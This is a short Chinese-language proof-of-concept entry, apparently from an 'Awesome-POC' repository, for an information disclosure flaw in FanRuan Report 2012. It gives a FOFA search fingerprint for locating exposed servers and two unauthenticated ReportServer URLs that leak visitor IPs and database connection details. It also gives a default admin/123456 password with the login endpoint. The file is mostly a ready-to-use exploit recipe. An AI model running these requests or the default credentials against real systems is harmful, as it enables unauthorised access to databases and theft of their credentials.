Awesome-POC/OA产品漏洞/帆软报表 2012 信息泄露漏洞.md
2022-12-05 11:09:28 +08:00

737 B
Raw Blame History

帆软报表 2012 信息泄露漏洞

漏洞描述

帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取部分敏感信息

漏洞影响

帆软报表 2012

FOFA

body="down.download?FM_SYS_ID"

漏洞复现

获取登录报表系统的IP

http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false

image-20220209113026424

数据库信息泄露

http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo

image-20220209113041021

后台默认口令 admin/123456

/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()